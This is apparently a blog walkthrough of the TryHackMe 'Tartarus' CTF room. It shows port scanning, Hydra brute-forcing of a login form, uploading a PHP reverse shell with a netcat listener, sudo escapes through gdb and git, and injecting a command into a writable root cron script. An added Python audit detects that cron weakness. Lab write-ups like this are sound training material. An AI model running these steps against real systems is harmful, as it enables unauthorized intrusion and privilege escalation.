Tartarus - Walkthrough

Ifediniruozioma
5 min read · Sep 27, 2020

This relatively easy CTF challenge can be found on the site TryHackMe.
First we deploy the machine and scan it for any open ports. In this example, I used nmap.
> nmap -sC -sS -sV -O -A <machine_ip>

FTP, SSH, and HTTP are open for us. We will check FTP first to see if we can log in anonymously.
When asked for a password, press the ENTER key.

Now for a little snooping. Using the ls command shows us one file called test.txt.

Reading it gives us nothing. Using ls -la, on the other hand, reveals more directories …
Enter that directory and rerun ls -a. Another odd directory. Keep going until you run into an actual file.

After downloading the file, read it and make note of the path you see.

Now that we know port 80 is open, let's enumerate it for hidden directories. We will use a directory enumeration tool called DIRB to
find out whether any other files or folders exist.

Navigate to the paths found by dirb. The robots.txt file lists a path and also a username.

When we navigate to the directory found in robots.txt, there are two files available. One looks like a bunch of passwords and the other contains possible usernames.
Copy the files manually or with wget.

> wget <URL>

So, let's go to the path we found in the FTP file.
We encounter a login page. We could attempt to guess the credentials, but there is a tool for that. We will use Hydra to test
credentials using the two files we just copied over to our computer.

> hydra -L <username_file> -P <password_file> <domain/ip> http-post-form "<login page>:username=^USER^&password=^PASS^:Incorrect username!"

We have a lot of credentials, so let's narrow it down to:

> hydra -l <username> -P <password_file> <domain/ip> http-post-form "<login page>:username=^USER^&password=^PASS^:Incorrect username!"

We have valid credentials! Log in and there is an upload page ready to be exploited.
To exploit this, let's upload something that will give us a reverse shell. Pentestmonkey has an excellent file called php-reverse-shell.php;
we'll navigate to https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php and download the file to our machine.
After downloading the file, edit it so that it uses your computer's IP address and the port you want to listen on.

Upload the edited version. You'll see that the upload was successful.
Navigate to the /images directory; this path holds our uploaded content. Before opening the file, go back to a terminal and prepare your end of the
reverse shell connection using netcat.

> nc -nlvp <port>

Now go to your uploaded file from the browser and you should have a shell prompt on the terminal.

First flag found!

Let’s see about getting the root flag.
If you run sudo -l, you’ll see we can execute /var/www/gdb as the user thirtytwo.

So we will exploit this to gain a shell as that user.

> sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit

GTFOBins is a great site for figuring out whether a command can be exploited or not. I highly recommend taking a look there:
https://gtfobins.github.io/

For the next part, we need to get an interactive shell.

> python -c 'import pty;pty.spawn("/bin/bash")'

Then we can run sudo -l and see that thirtytwo can run /usr/bin/git as the user d4rckh.

We will exploit that with this command.
> sudo -u d4rckh /usr/bin/git help config

Once you get a prompt saying (press RETURN), type this instead to get a new shell.

> !/bin/sh

Now we are d4rckh! We found our first flag in this user's home folder, so we will navigate there first. Run ls -la and we see a file called cleanup.py,
owned by root, that we can write to.

Reading the file, we notice this script executes system commands with os.system(). Before we write anything, we need to see how to get the command to run as root.
Check out the system crontab:
> cat /etc/crontab

The script we can abuse runs every two minutes as root.
Let’s carefully edit that script with a command to get us the root flag.

> echo "os.system('cat /root/root.txt > /home/flag; chmod 444 /home/flag')" >> /home/d4rckh/cleanup.py
> tail cleanup.py
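The root cause of this last step is a root cron job that executes a script an unprivileged user can edit. As an added example (not part of the original walkthrough or of the room), here is a small Python audit that finds such jobs: it parses crontab lines, resolves the absolute paths each root job touches, and flags any regular file that is owned by a non-root user or is group/world-writable. The crontab text, the file metadata and the function names are all constructed for this example.

```python
"""Audit a crontab for root jobs whose script a non-root user could edit (hypothetical helper)."""
import re
import stat

# Constructed sample in the layout of /etc/crontab; the cleanup.py job mirrors the one on the page.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
17 *  * * *  root    cd / && run-parts --report /etc/cron.hourly
*/2 * * * *  root    python3 /home/d4rckh/cleanup.py
0 3   * * *  root    /usr/local/bin/rotate.sh
0 4   * * *  backup  /usr/local/bin/backup.sh
"""
# Constructed (uid, gid, mode) triples standing in for os.stat() results.
SAMPLE_FILES = {
    "/home/d4rckh/cleanup.py": (0, 0, 0o100666),         # root-owned but world-writable
    "/usr/local/bin/rotate.sh": (1000, 1000, 0o100755),  # owned by an ordinary user
    "/usr/local/bin/backup.sh": (0, 0, 0o100755),        # fine, and not a root job anyway
}
JOB_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

def parse_jobs(text):
    """Return (user, command) pairs; skips blanks, comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^\w+=", s):
            continue
        m = JOB_LINE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs

def weakly_owned(uid, mode):
    """True if someone other than root could modify the file (non-root owner, or group/other write bit)."""
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(text, lookup):
    """Absolute paths used by root jobs that a non-root user could modify.
    lookup(path) returns (uid, gid, mode) like os.stat(), or None if the path does not exist."""
    findings = []
    for user, cmd in parse_jobs(text):
        if user != "root":
            continue
        for token in [t for t in cmd.split() if t.startswith("/")]:
            meta = lookup(token)
            if meta and stat.S_ISREG(meta[2]) and weakly_owned(meta[0], meta[2]):
                findings.append(token)
    return findings
```

To audit a live host, pass the text of /etc/crontab together with a wrapper around os.stat that returns (st_uid, st_gid, st_mode) or None for a missing path.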

Now, to get the root flag, simply type this command:
> cat ../flag

Thanks for using my walkthrough.


regards
NIRU IFEDINIRU OZIOMA
